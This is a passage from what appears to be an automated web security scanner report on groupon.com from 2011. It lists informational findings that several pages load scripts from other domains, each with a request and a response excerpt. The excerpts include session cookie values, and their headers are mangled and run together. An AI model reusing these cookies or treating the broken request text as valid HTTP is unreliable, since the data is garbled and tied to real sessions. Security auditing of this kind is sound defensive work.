GET /merchants/welcome HTTP/1.1.com//xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; _tpref=http%3A%2F%2Fliveoffgroupon.com%2F; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.21.7.1313841295603; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OK.grouponworks.com%2F; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:01:06 GMT-00505695132feda0ddd2e0d0571e3cf7eeb9; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:01:06 GMT-00505695132feda0ddd2e7daddb9cb120594; domain=.groupon.com; path=/4fedd9ee2bc8af30438c41; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:01:07 GMT; HttpOnlya2c56d220da1f".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/merchants/controller-c-qi0Jwa.js" type="text/javascript"> </script>...[SNIP]...
5.11. http://www.groupon.com/mobile
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/mobile
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/app/doc/mobile-UiiC51_u.js http://assets1.grouponcdn.com/static/javascripts/common/backbone-UOsRZUoV.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.cycle.lite-xBgEVX2J.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.maskedinput.min-Xm2YRJUg.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /mobile HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.12.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132feda0ddd2543d031307d0cd65; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:48 GMT-00505695132feda0ddd21b1d474f398584c0; domain=.groupon.com; path=/e7caebb143ba57b628ed99; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:48 GMT; HttpOnlyf1ad4020f211b".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/backbone-UOsRZUoV.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.cycle.lite-xBgEVX2J.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.maskedinput.min-Xm2YRJUg.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/doc/mobile-UiiC51_u.js" type="text/javascript"> </script>...[SNIP]...
5.12. http://www.groupon.com/now
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/now
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/javascripts/common/hoptoad_extensions.js?env=production http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/assets/now-PzackjWb.js http://assets1.grouponcdn.com/static/javascripts/app/now/deals/controller-Y71s6G8Y.js http://assets1.grouponcdn.com/static/javascripts/app/now/deals/home-E3K25NtL.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js http://maps.google.com/maps/api/js?sensor=false&v=3.4
Request
GET /now HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.4.9.1313841158728; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK-00505695132feda0ddd2a878fda7a55a2d3f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:55:29 GMT04e948; domain=.groupon.com; path=/=true; path=/092c69b1fcd789c8d410d4; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:55:30 GMT; HttpOnly846336d1724ef".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/javascripts/common/hoptoad_extensions.js?env=production" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://maps.google.com/maps/api/js?sensor=false&v=3.4" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/now-PzackjWb.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/now/deals/controller-Y71s6G8Y.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/app/now/deals/home-E3K25NtL.js" type="text/javascript"> </script>...[SNIP]...
5.13. http://www.groupon.com/pages/affiliates
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/affiliates
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /pages/affiliates HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.1850810143.1313841127.1313841127.1313841127.1; __utmb=44473723.10.7.1313841167628; __utmc=44473723; __utmz=44473723.1313841127.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OK-00505695132feda0ddd2835215e7457c8e54; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:57:25 GMT-00505695132feda0ddd2855dfa8cae677beb; domain=.groupon.com; path=/d92a28cd3b4e873e6252c1; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:57:25 GMT; HttpOnlyd1227d6a90fb1".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js" type="text/javascript"> </script>...[SNIP]...
5.14. http://www.groupon.com/pages/api
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/api
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /pages/api HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.4.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OKcaaa9e; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:50 GMT-00505695132feda0ddd264a895d76ea2aaa; domain=.groupon.com; path=/5f6fb102a5df9007c0345e; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:50 GMT; HttpOnly43f986276965a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js" type="text/javascript"> </script>...[SNIP]...
5.15. http://www.groupon.com/pages/corporate-gift-cards
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/corporate-gift-cards
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /pages/corporate-gift-cards HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.5.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OK-00505695132feda0ddd2cc8aa9390dfe883c; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:55 GMT-00505695132feda0ddd26a6fe44aa18c9a4a; domain=.groupon.com; path=/d2786383e597c692d197f2; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:56 GMT; HttpOnly035c008150134".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js" type="text/javascript"> </script>...[SNIP]...
5.16. http://www.groupon.com/pages/groupon-jobs-frameresize
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/pages/groupon-jobs-frameresize
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /pages/groupon-jobs-frameresize?height=2782 HTTP/1.1/CompanyJobs/Careers.aspx?c=qcZ9VfwZ&jvresize=http://www.groupon.com/pages/groupon-jobs-frameresize/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; _chartbeat2=e8v98moqfru8d0uh; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.16.7.1313841243632; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|1=Exp-deal-page-081811=NowRightRail%2FRightRailV1=1,2=Exp-places-080311=Places1%2Fgroup2=1; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
HTTP/1.1 200 OK.jobvite.com%2FCompanyJobs%2FCareers.aspx%3Fc%3DqcZ9VfwZ%26jvresize%3Dhttp%3A%2F%2Fwww.groupon.com%2Fpages%2Fgroupon-jobs-frameresize; domain=.groupon.com; path=/; expires=Sat, 27-Aug-2011 12:00:00 GMT-00505695132f; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 12:00:00 GMT-00505695132f; domain=.groupon.com; path=/21726e6fb720f93a27ac9c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 12:00:00 GMT; HttpOnly23958c6bb2afd".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/app/contents/show-opoE8NeF.js" type="text/javascript"> </script>...[SNIP]...
5.17. http://www.groupon.com/press
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/press
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js
Request
GET /press HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3%2F%2Fwww.groupon.com%2Fdallas%2F; visited=true; has_visited_now_deals=true; adchemy_id=; division=dallas; b=e4d26f04-cb22-11e0-a02d-00505695132f; s=e4d27710-cb22-11e0-a02d-00505695132f; _thepoint=29d716aaaba465d2f3049f987a77dc85; __utma=44473723.936981430.1313841222.1313841222.1313841222.1; __utmb=44473723.3.10.1313841222; __utmc=44473723; __utmz=44473723.1313841222.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=44473723.|2=Exp-places-080311=Places1%2Fgroup2=1
Response
HTTP/1.1 200 OK-00505695132feda0ddd29fea6cee6b39ca7d; domain=.groupon.com; path=/; expires=Fri, 20-Aug-2021 11:58:27 GMT-00505695132feda0ddd2edb603e5125278ec; domain=.groupon.com; path=/a55f4549b5b6391dde187c; domain=.groupon.com; path=/; expires=Sun, 21 Aug 2011 11:58:27 GMT; HttpOnlya39a885430d5a".facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->...[SNIP]... <script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js" type="text/javascript"> </script>...[SNIP]... <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js" type="text/javascript"> </script><script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js" type="text/javascript"> </script><script src="http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/application-h6awGMXN.js" type="text/javascript"> </script>...[SNIP]... <script src="http://assets1.grouponcdn.com/static/assets/facebook-MKNbeh7E.js" type="text/javascript"> </script>...[SNIP]...
5.18. http://www.groupon.com/subscriptions/new
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.groupon.com
Path:
/subscriptions/new
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js http://assets1.grouponcdn.com/static/assets/subscriptions-wVnbKY7b.js http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/alerts-IrgXe2LC.js http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/disable_on_submit--rDwJEm-.js http://assets1.grouponcdn.com/static/javascripts/app/subscriptions/multi_steps-opO74hi1.js http://assets1.grouponcdn.com/static/javascripts/common/attribute_reader-RS-sBH34.js http://assets1.grouponcdn.com/static/javascripts/common/cookie-5t3UUKHC.js http://assets1.grouponcdn.com/static/javascripts/common/finch-jDC2a2wA.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch-k4i_yjx3.js http://assets1.grouponcdn.com/static/javascripts/common/groupon_finch_init-ttb07SXy.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.md5-Oz7bVl92.js http://assets1.grouponcdn.com/static/javascripts/common/jquery.sha256-MHjUM5vi.js http://assets1.grouponcdn.com/static/javascripts/dev/jquery.validate-DEXiqLMx.js http://www.googleadservices.com/pagead/conversion.js
Request
GET /subscriptions/new?division_p=dallas HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.3-00505695132f; s=cf0d2b32-cb22-11e0-85e8-00505695132f; visited=visit_1; _thepoint=29d716aaaba465d2f3049f987a77dc85
Response
